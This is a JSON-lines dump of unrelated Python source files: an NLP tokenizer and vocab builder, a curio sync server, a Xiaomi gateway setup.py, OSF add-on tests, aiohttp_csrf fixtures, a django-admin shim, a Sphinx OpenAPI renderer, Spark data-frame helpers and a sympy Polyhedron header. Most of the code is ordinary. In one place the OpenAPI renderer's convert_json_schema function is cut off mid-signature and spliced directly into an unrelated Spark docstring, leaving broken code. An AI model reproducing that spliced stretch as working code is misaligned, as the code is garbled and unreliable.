stopword):\n tokens = tokenize(sent.strip().lower())\n tokens = re.sub(r'[^A-Za-z0-9]+',' ', ' '.join(tokens))\n tokens = [tok for tok in tokens.split() if tok not in stopword]\n tokens = [tok if not is_num(tok) else '' for tok in tokens]\n tokens = [lemtzr.lemmatize(tok) for tok in tokens]\n return tokens\n\n\ndef tokenize_train_file(fname):\n \"\"\"\n Tokenize the raw train data(unlabeled).\n \"\"\"\n split_fname = fname.split('/')\n new_fname = '/'.join([el if idx != len(split_fname) - 1 else 'parsed_' + el for idx, el in enumerate(split_fname)])\n if os.path.exists(new_fname): return new_fname\n\n with open(fname, 'r', encoding='utf8') as f:\n ls = f.readlines()\n\n parsed_data = []\n lemtzr = WordNetLemmatizer()\n stopword = stopwords.words('english')\n\n for line in ls:\n tokens = tokenize_sent(line, lemtzr, stopword)\n parsed_data.append(tokens)\n\n save_file(parsed_data, new_fname)\n return new_fname\n\n\ndef tokenize_labeled_test_file(fname, label_fname):\n \"\"\"\n Tokenize the raw test data (labelled).\n \"\"\"\n split_fname = fname.split('/')\n new_fname = '/'.join([el if idx != len(split_fname) - 1 else 'parsed_' + el for idx, el in enumerate(split_fname)])\n label_map_fname = '/'.join([el if idx != len(split_fname) - 1 else 'label_map.txt' for idx, el in enumerate(split_fname)])\n if os.path.exists(new_fname): return label_map_fname, new_fname\n\n with open(fname, 'r', encoding='utf8') as f1, open(label_fname, 'r', encoding='utf8') as f2:\n ls1, ls2 = f1.readlines(), f2.readlines()\n\n parsed_data = []\n lemtzr = WordNetLemmatizer()\n stopword = stopwords.words('english')\n\n for line in ls1:\n tokens = tokenize_sent(line, lemtzr, stopword)\n parsed_data.append(tokens)\n\n assert len(ls1) == len(ls2) == len(parsed_data)\n\n new_parsed, new_ls2 = [], []\n for parsed, label in zip(parsed_data, ls2):\n if 'Positive' in label or 'Neutral' in label:\n continue\n new_parsed.append(parsed)\n new_ls2.append(label)\n\n assert len(new_parsed) == len(new_ls2)\n parsed_data, ls2 = new_parsed, new_ls2\n\n label_text = list(set([tok for line in ls2 for tok in line.strip().split()]))\n\n label_map = dict()\n print(\"Label for this dataset with assigned index is as follows.\")\n for idx, label in enumerate(label_text):\n print('{}: {}'.format(label, idx))\n label_map[label] = idx\n with open(label_map_fname, 'w') as f:\n for key,val in label_map.items():\n f.write(\"{} {} ||| \".format(key, val))\n\n for idx, data in enumerate(parsed_data):\n labels = ls2[idx].strip().split()\n assert all([label in list(label_map.keys()) for label in labels])\n parsed_data[idx].insert(0, '|||')\n for label in labels:\n parsed_data[idx].insert(0, str(label_map[label]))\n\n save_file(parsed_data, new_fname)\n return label_map_fname, new_fname\n\n\ndef build_vocab(parsed_train_fname, vocab_file, vocab_size=30000):\n \"\"\"\n Build vocab based on frequency of each word in train set.\n Save vocab file and return vocab list.\n \"\"\"\n if os.path.exists(vocab_file):\n with open(vocab_file, 'r', encoding='utf8') as f:\n ls = f.readlines()\n assert len(ls) == vocab_size\n vocab = [line.strip() for line in ls]\n return vocab\n\n with open(parsed_train_fname, 'r', encoding='utf8') as f:\n ls = f.readlines()\n tokens = [tok for line in ls for tok in line.strip().split()]\n counts = dict(collections.Counter(tokens))\n\n import operator\n vocab = sorted(counts.items(), key=operator.itemgetter(1), reverse=True)\n print(\"TOTAL VOCAB SIZE: {}\".format(len(vocab)))\n\n for idx,tok in enumerate(vocab):\n if tok[1] <= 10:\n 
print(\"WORDS MORE THAN 10: {}\".format(idx))\n break\n vocab = [tok[0] for tok in vocab][:idx]\n\n vocab.append('')\n vocab.append('')\n\n assert all([isinstance(tok, str) for tok in vocab])\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join([tok for tok in vocab]))\n return vocab\n\n\ndef save_file(data, new_fname):\n \"\"\"\n Change the \"raw_fname\" into parsed fname, then save \"data\" into parsed fname.\n \"\"\"\n assert isinstance(data, list)\n\n with open(new_fname, 'w') as f: f.write('\\n'.join([\" \".join(one_sample) for one_sample in data]))\n\n\ndef tokenize(sent):\n assert isinstance(sent, str)\n return word_tokenize(sent)\n\n\ndef make_binary_dataset(fname, is_label=False):\n \"\"\"\n Make a binary data file for learning.\n \"\"\"\n binary_fname = fname.replace('.txt', '.bin')\n if os.path.exists(binary_fname): return\n\n with open(fname, 'r', encoding='utf8') as f:\n ls = f.readlines()\n data = [line.strip() for line in ls]\n\n assert all(['|||' in dat for dat in data]) if is_label else all(['|||' not in dat for dat in data])\n\n with open(binary_fname, 'wb') as f:\n for line in data:\n if is_label:\n split_line = line.split('|||')\n assert len(split_line) == 2\n label, text = split_line[0].strip(), split_line[1].strip()\n else:\n text = line\n example = example_pb2.Example()\n example.features.feature['text'].bytes_list.value.extend([text.encode()])\n if is_label:\n example.features.feature['label'].bytes_list.value.extend([label.encode()])\n example_str = example.SerializeToString()\n str_len = len(example_str)\n f.write(struct.pack('q', str_len))\n f.write(struct.pack('%ds' % str_len, example_str))\n return\n\n\ndef main():\n train_fname = './data/datasets/{}/train.txt'.format(args.dataset)\n test_fname = './data/datasets/{}/test.txt'.format(args.dataset)\n test_label_fname = './data/datasets/{}/test_label.txt'.format(args.dataset)\n vocab_fname = './data/vocab.txt'\n vocab_size = args.vocab_size\n\n parsed_train_fname = tokenize_train_file(train_fname)\n label_map, parsed_test_fname = tokenize_labeled_test_file(test_fname, test_label_fname)\n build_vocab(parsed_train_fname, vocab_fname, vocab_size=vocab_size)\n\n make_binary_dataset(parsed_train_fname, False)\n make_binary_dataset(parsed_test_fname, True)\n\n\nif __name__ == '__main__':\n main()"} {"ext": "py", "sha": "1a2f13906d5d70ee00a1c331f3fdf608d4b11f45", "content": "from pykit import logutil\n\nprint logutil.get_root_log_fn()\n"} {"ext": "py", "sha": "1a2f14470add748350681a749085c0b0bb7f4168", "content": "#!/usr/bin/env python3\n\nfrom os import environ\nfrom curio import Channel, run\nsyncword = environ.get('RRIDBOT_SYNC')\nchan = ('localhost', 12345)\nasync def consumer():\n ch = Channel(chan)\n c = await ch.accept(authkey=syncword.encode())\n myset = set()\n while True:\n try:\n msg = await c.recv()\n except (EOFError, ConnectionResetError) as e: # in the event that the client closes\n print('resetting')\n myset = set()\n c = await ch.accept(authkey=syncword.encode())\n continue\n if msg is None: # explicit reset\n myset = set()\n else:\n op, uri = msg.split(' ', 1)\n print(op, uri)\n if op == 'add':\n if uri in myset:\n await c.send(True)\n else:\n myset.add(uri)\n await c.send(False)\n elif op == 'del':\n myset.discard(uri)\n await c.send(False)\n else:\n await c.send('ERROR')\n print(myset)\n\nif __name__ == '__main__':\n run(consumer)\n\n"} {"ext": "py", "sha": "1a2f1469fdb17a381028170642ef12b2ee49d969", "content": "from setuptools import setup\n\nsetup(\n name = 'PyXiaomiGateway',\n packages = 
['xiaomi_gateway'],\n install_requires=['cryptography>=2.1.1'],\n version = '0.11.1',\n description = 'A library to communicate with the Xiaomi Gateway',\n author='Daniel Hoyer Iversen',\n url='https://github.com/Danielhiversen/PyXiaomiGateway/',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Other Environment',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Home Automation',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n"} {"ext": "py", "sha": "1a2f146b723483bb72f845343fd511e3a7fafc90", "content": "from nose.tools import * # noqa\n\nfrom framework.auth.core import Auth\n\nfrom tests.base import OsfTestCase\nfrom tests.factories import AuthUserFactory, ProjectFactory, BookmarkCollectionFactory\n\nfrom scripts.analytics.addon_snapshot import AddonSnapshot\n\nfrom website.models import Node\nfrom framework.auth.core import User\nfrom website.settings import ADDONS_AVAILABLE\nfrom addons.github.tests.factories import GitHubAccountFactory\nfrom addons.github.model import GitHubNodeSettings, GitHubUserSettings\nfrom addons.googledrive.tests.factories import GoogleDriveAccountFactory\nfrom addons.googledrive.model import GoogleDriveNodeSettings, GoogleDriveUserSettings\n\n\nclass TestAddonCount(OsfTestCase):\n def setUp(self):\n super(TestAddonCount, self).setUp()\n self.user = AuthUserFactory()\n self.node = ProjectFactory(creator=self.user)\n self.user.add_addon('github')\n self.user_addon = self.user.get_addon('github')\n\n self.external_account = GitHubAccountFactory(display_name='hmoco1')\n\n self.user_settings = self.user.get_or_add_addon('github')\n\n self.user_settings.save()\n self.user.external_accounts.append(self.external_account)\n self.user.save()\n self.node.add_addon('github', Auth(self.user))\n self.node_addon = self.node.get_addon('github')\n self.node_addon.user = self.user.fullname\n self.node_addon.repo = '29 #Strafford APTS'\n self.node_addon.user_settings = self.user_addon\n self.node_addon.external_account = self.external_account\n self.node_addon.save()\n\n self.user_settings.grant_oauth_access(\n node=self.node,\n external_account=self.external_account,\n )\n def tearDown(self):\n GitHubNodeSettings.remove()\n GitHubUserSettings.remove()\n GoogleDriveNodeSettings.remove()\n GoogleDriveUserSettings.remove()\n\n def test_run_for_all_addon(self):\n results = AddonSnapshot().get_events()\n names = [res['provider']['name'] for res in results]\n for addon in ADDONS_AVAILABLE:\n assert_in(addon.short_name, names)\n\n def test_one_user_one_node_one_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(github_res['nodes']['total'], 1)\n\n def test_one_user_one_node_one_addon_one_node_linked(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(github_res['nodes']['total'], 1)\n\n def test_one_user_with_multiple_githubs(self):\n oauth_settings2 = GitHubAccountFactory(display_name='hmoco2')\n oauth_settings2.save()\n self.user.external_accounts.append(oauth_settings2)\n self.user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 1)\n\n def 
test_one_user_with_multiple_addons(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(googledrive_res['users']['enabled'], 0)\n\n self.user.add_addon('googledrive')\n oauth_settings = GoogleDriveAccountFactory()\n oauth_settings.save()\n self.user.external_accounts.append(oauth_settings)\n self.user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(googledrive_res['users']['enabled'], 1)\n\n def test_many_users_each_with_a_different_github(self):\n user = AuthUserFactory()\n user.add_addon('github')\n oauth_settings2 = GitHubAccountFactory(display_name='hmoco2')\n oauth_settings2.save()\n user.external_accounts.append(oauth_settings2)\n user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 2)\n assert_equal(github_res['users']['authorized'], 1)\n assert_equal(github_res['users']['linked'], 1)\n\n def test_many_users_each_with_the_same_github_enabled(self):\n user = AuthUserFactory()\n user.add_addon('github')\n user.external_accounts.append(self.external_account)\n user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 2)\n\n def test_github_enabled_not_linked_or_authorized(self):\n user = AuthUserFactory()\n user.add_addon('github')\n user.external_accounts.append(self.external_account)\n user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 2)\n assert_equal(github_res['users']['authorized'], 1)\n assert_equal(github_res['users']['linked'], 1)\n\n def test_one_node_with_multiple_addons(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['nodes']['total'], 1)\n assert_equal(googledrive_res['nodes']['total'], 0)\n\n self.user.add_addon('googledrive')\n user_addon = self.user.get_addon('googledrive')\n oauth_settings = GoogleDriveAccountFactory()\n oauth_settings.save()\n self.user.external_accounts.append(oauth_settings)\n self.user.save()\n self.node.add_addon('googledrive', Auth(self.user))\n node_addon = self.node.get_addon('googledrive')\n node_addon.user = self.user.fullname\n node_addon.user_settings = user_addon\n node_addon.external_account = oauth_settings\n node_addon.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['nodes']['total'], 1)\n assert_equal(googledrive_res['nodes']['total'], 1)\n\n def test_many_nodes_with_one_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 
'github'][0]\n assert_equal(github_res['nodes']['total'], 1)\n\n node = ProjectFactory(creator=self.user)\n node.add_addon('github', Auth(self.user))\n node_addon = node.get_addon('github')\n node_addon.user = self.user.fullname\n node_addon.repo = '8 (circle)'\n node_addon.user_settings = self.user_addon\n node_addon.external_account = self.external_account\n node_addon.save()\n node.save()\n\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['total'], 2)\n\n def test_node_count_deleted_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['deleted'], 0)\n\n node = ProjectFactory(creator=self.user)\n node.add_addon('github', Auth(self.user))\n node_addon = node.get_addon('github')\n node_addon.delete()\n\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['deleted'], 1)\n\n def test_node_count_disconected_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['disconnected'], 0)\n\n node = ProjectFactory(creator=self.user)\n node.add_addon('github', Auth(self.user))\n node_addon = node.get_addon('github')\n node_addon.external_account = None\n node_addon.save()\n\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['disconnected'], 1)\n\n def test_all_users_have_wiki_osfstorage_enabled(self):\n all_user_count = User.find().count()\n results = AddonSnapshot().get_events()\n osfstorage_res = [res for res in results if res['provider']['name'] == 'osfstorage'][0]\n wiki_res = [res for res in results if res['provider']['name'] == 'osfstorage'][0]\n\n assert_equal(osfstorage_res['users']['enabled'], all_user_count)\n assert_equal(wiki_res['users']['enabled'], all_user_count)\n\n def test_wiki_deleted_shows_as_deleted(self):\n node = ProjectFactory(creator=self.user)\n node.delete_addon('wiki', auth=Auth(self.user))\n\n results = AddonSnapshot().get_events()\n wiki_res = [res for res in results if res['provider']['name'] == 'wiki'][0]\n\n assert_equal(wiki_res['nodes']['deleted'], 1)\n\n def test_node_settings_has_no_owner_not_connected(self):\n self.node_addon.owner = None\n self.node_addon.save()\n\n results = AddonSnapshot().get_events()\n storage_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(storage_res['nodes']['connected'], 0)\n\n def test_bookmark_collection_not_counted(self):\n BookmarkCollectionFactory(creator=self.user)\n all_node_count = Node.find().count()\n\n results = AddonSnapshot().get_events()\n storage_res = [res for res in results if res['provider']['name'] == 'osfstorage'][0]\n assert_equal(storage_res['nodes']['connected'], all_node_count - 1)\n"} {"ext": "py", "sha": "1a2f168617074cd9c152689e717fcdbd2d133936", "content": "import aiohttp_csrf\nimport pytest\nfrom aiohttp import web\n\nSESSION_NAME = COOKIE_NAME = 'csrf_token'\nFORM_FIELD_NAME = HEADER_NAME = 'X-CSRF-TOKEN'\n\n\n@pytest.yield_fixture\ndef init_app():\n def go(\n loop,\n policy,\n storage,\n handlers,\n error_renderer=None,\n ):\n app = web.Application()\n\n kwargs = {\n 'policy': policy,\n 'storage': storage,\n }\n\n if 
error_renderer is not None:\n kwargs['error_renderer'] = error_renderer\n\n aiohttp_csrf.setup(app, **kwargs)\n\n for method, url, handler in handlers:\n app.router.add_route(\n method,\n url,\n handler,\n )\n\n return app\n\n yield go\n\n\n@pytest.fixture(params=[\n (aiohttp_csrf.policy.FormPolicy, (FORM_FIELD_NAME,)),\n (aiohttp_csrf.policy.FormAndHeaderPolicy, (HEADER_NAME, FORM_FIELD_NAME)),\n])\ndef csrf_form_policy(request):\n _class, args = request.param\n\n return _class(*args)\n\n\n@pytest.fixture(params=[\n (aiohttp_csrf.policy.HeaderPolicy, (HEADER_NAME,)),\n (aiohttp_csrf.policy.FormAndHeaderPolicy, (HEADER_NAME, FORM_FIELD_NAME)),\n])\ndef csrf_header_policy(request):\n _class, args = request.param\n\n return _class(*args)\n\n\n@pytest.fixture(params=[\n (aiohttp_csrf.storage.SessionStorage, (SESSION_NAME,)),\n (aiohttp_csrf.storage.CookieStorage, (COOKIE_NAME,)),\n])\ndef csrf_storage(request):\n _class, args = request.param\n\n return _class(*args)\n"} {"ext": "py", "sha": "1a2f19cc0f4e0c144822e2b2571cdbfe170f1ec3", "content": "#!/home/access/Downloads/Desktop/Django_IPs/week4_IP/neighbourhood/virtual/bin/python3.8\n# When the django-admin.py deprecation ends, remove this script.\nimport warnings\n\nfrom django.core import management\n\ntry:\n from django.utils.deprecation import RemovedInDjango40Warning\nexcept ImportError:\n raise ImportError(\n 'django-admin.py was deprecated in Django 3.1 and removed in Django '\n '4.0. Please manually remove this script from your virtual environment '\n 'and use django-admin instead.'\n )\n\nif __name__ == \"__main__\":\n warnings.warn(\n 'django-admin.py is deprecated in favor of django-admin.',\n RemovedInDjango40Warning,\n )\n management.execute_from_command_line()\n"} {"ext": "py", "sha": "1a2f1a7039bf078ca8ad698605d42a9ba5d862d2", "content": "\"\"\"\n sphinxcontrib.openapi.openapi30\n -------------------------------\n\n The OpenAPI 3.0.0 spec renderer. 
Based on ``sphinxcontrib-httpdomain``.\n\n :copyright: (c) 2016, Ihor Kalnytskyi.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nimport copy\n\nimport collections\nimport collections.abc\n\nfrom datetime import datetime\nimport itertools\nimport json\nimport re\nfrom urllib import parse\nfrom http.client import responses as http_status_codes\n\nfrom sphinx.util import logging\n\nfrom sphinxcontrib.openapi import utils\n\n\nLOG = logging.getLogger(__name__)\n\n# https://github.com/OAI/OpenAPI-Specification/blob/3.0.2/versions/3.0.0.md#data-types\n_TYPE_MAPPING = {\n ('integer', 'int32'): 1, # integer\n ('integer', 'int64'): 1, # long\n ('number', 'float'): 1.0, # float\n ('number', 'double'): 1.0, # double\n ('boolean', None): True, # boolean\n ('string', None): 'string', # string\n ('string', 'byte'): 'c3RyaW5n', # b'string' encoded in base64, # byte\n ('string', 'binary'): '01010101', # binary\n ('string', 'date'): datetime.now().date().isoformat(), # date\n ('string', 'date-time'): datetime.now().isoformat(), # dateTime\n ('string', 'password'): '********', # password\n\n # custom extensions to handle common formats\n ('string', 'email'): 'name@example.com',\n ('string', 'zip-code'): '90210',\n ('string', 'uri'): 'https://example.com',\n\n # additional fallthrough cases\n ('integer', None): 1, # integer\n ('number', None): 1.0, # \n}\n\n_READONLY_PROPERTY = object() # sentinel for values not included in requests\n\n\ndef _dict_merge(dct, merge_dct):\n \"\"\"Recursive dict merge.\n\n Inspired by :meth:``dict.update()``, instead of updating only top-level\n keys, dict_merge recurses down into dicts nested to an arbitrary depth,\n updating keys. The ``merge_dct`` is merged into ``dct``.\n\n From https://gist.github.com/angstwad/bf22d1822c38a92ec0a9\n\n Arguments:\n dct: dict onto which the merge is executed\n merge_dct: dct merged into dct\n \"\"\"\n for k in merge_dct.keys():\n if (k in dct and isinstance(dct[k], dict)\n and isinstance(merge_dct[k], collections.abc.Mapping)):\n _dict_merge(dct[k], merge_dct[k])\n else:\n dct[k] = merge_dct[k]\n\n\ndef _parse_schema(schema, method):\n \"\"\"\n Convert a Schema Object to a Python object.\n\n Args:\n schema: An ``OrderedDict`` representing the schema object.\n \"\"\"\n if method and schema.get('readOnly', False):\n return _READONLY_PROPERTY\n\n # allOf: Must be valid against all of the subschemas\n if 'allOf' in schema:\n schema_ = copy.deepcopy(schema['allOf'][0])\n for x in schema['allOf'][1:]:\n _dict_merge(schema_, x)\n\n return _parse_schema(schema_, method)\n\n # anyOf: Must be valid against any of the subschemas\n # TODO(stephenfin): Handle anyOf\n\n # oneOf: Must be valid against exactly one of the subschemas\n if 'oneOf' in schema:\n # we only show the first one since we can't show everything\n return _parse_schema(schema['oneOf'][0], method)\n\n if 'enum' in schema:\n # we only show the first one since we can't show everything\n return schema['enum'][0]\n\n schema_type = schema.get('type', 'object')\n\n if schema_type == 'array':\n # special case oneOf and anyOf so that we can show examples for all\n # possible combinations\n if 'oneOf' in schema['items']:\n return [\n _parse_schema(x, method) for x in schema['items']['oneOf']\n ]\n\n if 'anyOf' in schema['items']:\n return [\n _parse_schema(x, method) for x in schema['items']['anyOf']\n ]\n\n return [_parse_schema(schema['items'], method)]\n\n if schema_type == 'object':\n if method and 'properties' in schema and \\\n all(v.get('readOnly', False)\n for v in 
schema['properties'].values()):\n return _READONLY_PROPERTY\n\n results = []\n for name, prop in schema.get('properties', {}).items():\n result = _parse_schema(prop, method)\n if result != _READONLY_PROPERTY:\n results.append((name, result))\n\n return collections.OrderedDict(results)\n\n if (schema_type, schema.get('format')) in _TYPE_MAPPING:\n return _TYPE_MAPPING[(schema_type, schema.get('format'))]\n\n return _TYPE_MAPPING[(schema_type, None)] # unrecognized format\n\n\ndef _example(media_type_objects, method=None, endpoint=None, status=None,\n nb_indent=0):\n \"\"\"\n Format examples in `Media Type Object` openapi v3 to HTTP request or\n HTTP response example.\n If method and endpoint is provided, this function prints a request example\n else status should be provided to print a response example.\n\n Arguments:\n media_type_objects (Dict[str, Dict]): Dict containing\n Media Type Objects.\n method: The HTTP method to use in example.\n endpoint: The HTTP route to use in example.\n status: The HTTP status to use in example.\n \"\"\"\n indent = ' '\n extra_indent = indent * nb_indent\n\n if method is not None:\n method = method.upper()\n else:\n try:\n # one of possible values for status might be 'default'.\n # in the case, just fallback to '-'\n status_text = http_status_codes[int(status)]\n except (ValueError, KeyError):\n status_text = '-'\n\n # Provide request samples for GET requests\n if method == 'GET':\n media_type_objects[''] = {\n 'examples': {'Example request': {'value': ''}}}\n\n for content_type, content in media_type_objects.items():\n examples = content.get('examples')\n example = content.get('example')\n\n # Try to get the example from the schema\n if example is None and 'schema' in content:\n example = content['schema'].get('example')\n\n if examples is None:\n examples = {}\n if not example:\n if re.match(r\"application/[a-zA-Z\\+]*json\", content_type) is \\\n None:\n LOG.info('skipping non-JSON example generation.')\n continue\n example = _parse_schema(content['schema'], method=method)\n\n if method is None:\n examples['Example response'] = {\n 'value': example,\n }\n else:\n examples['Example request'] = {\n 'value': example,\n }\n\n for example in examples.values():\n # According to OpenAPI v3 specs, string examples should be left unchanged\n if not isinstance(example['value'], str):\n example['value'] = json.dumps(\n example['value'], indent=4, separators=(',', ': '))\n\n for example_name, example in examples.items():\n if 'summary' in example:\n example_title = '{example_name} - {example[summary]}'.format(\n **locals())\n else:\n example_title = example_name\n\n yield ''\n yield '{extra_indent}**{example_title}:**'.format(**locals())\n yield ''\n yield '{extra_indent}.. 
sourcecode:: http'.format(**locals())\n yield ''\n\n # Print http request example\n if method:\n yield '{extra_indent}{indent}{method} {endpoint} HTTP/1.1' \\\n .format(**locals())\n yield '{extra_indent}{indent}Host: example.com' \\\n .format(**locals())\n if content_type:\n yield '{extra_indent}{indent}Content-Type: {content_type}'\\\n .format(**locals())\n\n # Print http response example\n else:\n yield '{extra_indent}{indent}HTTP/1.1 {status} {status_text}' \\\n .format(**locals())\n yield '{extra_indent}{indent}Content-Type: {content_type}' \\\n .format(**locals())\n\n yield ''\n for example_line in example['value'].splitlines():\n yield '{extra_indent}{indent}{example_line}'.format(**locals())\n if example['value'].splitlines():\n yield ''\n\n\ndef convert_json_schema(schema, directive=':>> spark = pyspark.sql.SparkSession.builder.getOrCreate()\n >>> df = create_spark_df(spark,\n >>> [[1, 1.1, 'one'], [2, 2.2, 'two']],\n >>> schema=['int', 'float', 'str'],\n >>> process_methods=[('repartition', (), {'numPartitions': 6})])\n >>> df.show()\n +---+-----+---+\n |int|float|str|\n +---+-----+---+\n | 2| 2.2|two|\n | 1| 1.1|one|\n +---+-----+---+\n\n :param pyspark.sql.SparkSession spark: SparkSession instance\n :param data: input dataset\n :param schema: schema of created data frame\n :param iterable process_methods: methods to apply on the data frame after creation\n :returns: created data frame\n :rtype: pyspark.sql.DataFrame\n \"\"\"\n # check if data-frame schema was provided\n if isinstance(schema, int):\n # infer schema from a single row (prevents Spark >= 1.6.1 from checking schema of all rows)\n def get_row(data, ind):\n \"\"\"Get row.\"\"\"\n try:\n return data.iloc[ind].tolist()\n except AttributeError:\n pass\n try:\n row = data.first()\n if ind > 0:\n logger.warning('Inferring data-frame schema from first row, instead of row with index {i:d}', i=ind)\n return row\n except AttributeError:\n pass\n try:\n return data[ind]\n except TypeError:\n raise TypeError('Unable to get row from data of type \"{!s}\" to infer schema.'.format(type(data)))\n\n row = get_row(data, schema)\n\n def to_python_type(var):\n \"\"\"Get item.\"\"\"\n try:\n return var.item()\n except AttributeError:\n return var\n\n schema = pyspark.sql.types._infer_schema(tuple(to_python_type(it) for it in row))\n try:\n for t, n in zip(schema.fields, data.columns):\n t.name = str(n)\n except AttributeError:\n pass\n elif isinstance(schema, dict):\n # create schema from dictionary of (name, data type) pairs\n schema = df_schema(schema)\n kwargs['schema'] = schema\n\n # check if input is a data frame\n if isinstance(data, pyspark.sql.DataFrame):\n if not kwargs['schema']:\n kwargs['schema'] = data.schema\n data = data.rdd\n\n # create and transform data frame\n df = spark.createDataFrame(data, **kwargs)\n if process_methods:\n df = apply_transform_funcs(df, process_methods)\n return df\n\n\ndef df_schema(schema_spec):\n \"\"\"Create Spark data-frame schema.\n\n Create a schema for a Spark data frame from a dictionary of (name, data\n type) pairs, describing the columns. 
Data types are specified by Python\n types or by Spark-SQL types from the pyspark.sql.types module.\n\n >>> from collections import OrderedDict as odict\n >>> schema_dict = odict()\n >>> schema_dict['foo'] = pyspark.sql.types.IntegerType()\n >>> schema_dict['bar'] = odict([('descr', str), ('val', float)])\n >>> print(schema_dict)\n OrderedDict([('foo', IntegerType), ('bar', OrderedDict([('descr', ), ('val', )]))])\n >>> spark = pyspark.sql.SparkSession.builder.getOrCreate()\n >>> df = spark.createDataFrame([(1, ('one', 1.1)), (2, ('two', 2.2))], schema=df_schema(schema_dict))\n >>> df.show()\n +---+---------+\n |foo| bar|\n +---+---------+\n | 1|[one,1.1]|\n | 2|[two,2.2]|\n +---+---------+\n\n :param dict schema_spec: schema specification\n :returns: data-frame schema\n :rtype: pyspark.sql.types.StructType\n :raises: TypeError if data type is specified incorrectly\n \"\"\"\n def get_field(name, data_type):\n \"\"\"Return a struct field for specified data type.\"\"\"\n # treat dictionaries as struct types\n if isinstance(data_type, dict):\n data_type = pyspark.sql.types.StructType([get_field(*spec) for spec in data_type.items()])\n\n # convert Python types to Spark-SQL types\n data_type = SPARK_SQL_TYPES.get(data_type, data_type)\n\n # convert Spark-SQL type classes to Spark-SQL types\n if isinstance(data_type, type) and issubclass(data_type, pyspark.sql.types.DataType):\n data_type = data_type()\n\n # check and return data type\n if not isinstance(data_type, pyspark.sql.types.DataType):\n raise TypeError('Type specifications for data-frame schemas must be DataTypes or dictionaries')\n return pyspark.sql.types.StructField(str(name), data_type)\n\n # return a struct type with a list of struct fields for specified data types\n return pyspark.sql.types.StructType([get_field(*spec) for spec in schema_spec.items()])\n\n\ndef hive_table_from_df(spark, df, db, table):\n \"\"\"Create a Hive table from a Spark data frame.\n\n :param pyspark.sql.SparkSession spark: SparkSession instance\n :param pyspark.sql.DataFrame df: input data frame\n :param str db: database for table\n :param str table: name of table\n \"\"\"\n # register temporary table\n temp_name = '{0:s}_{1:s}'.format(table, uuid.uuid4().hex)\n df.createOrReplaceTempView(temp_name)\n\n # create table\n table_spec = '.'.join(s for s in (db, table) if s)\n create_table_query = 'CREATE TABLE {spec} AS SELECT {cols} FROM {name}'\\\n .format(name=temp_name, spec=table_spec, cols=', '.join(c for c in df.columns))\n logger.debug(create_table_query)\n spark.sql(create_table_query)\n"} {"ext": "py", "sha": "1a2f1ba9fc07fd45ad77d1130f313f8ae5c254b2", "content": "from sympy.combinatorics import Permutation as Perm\nfrom sympy.combinatorics.perm_groups import PermutationGroup\nfrom sympy.core import Basic, Tuple\nfrom sympy.core.compatibility import as_int\nfrom sympy.sets import FiniteSet\nfrom sympy.utilities.iterables import (minlex, unflatten, flatten)\n\nrmul = Perm.rmul\n\n\nclass Polyhedron(Basic):\n \"\"\"\n Represents the polyhedral symmetry group (PSG).\n\n Explanation\n ===========\n\n The PSG is one of the symmetry groups of the Platonic solids.\n There are three polyhedral groups: the tetrahedral group\n of order 12, the octahedral group of order 24, and the\n icosahedral group of order 60.\n\n All doctests have been given in the docstring of the\n constructor of the object.\n\n References\n ==========\n\n .. 
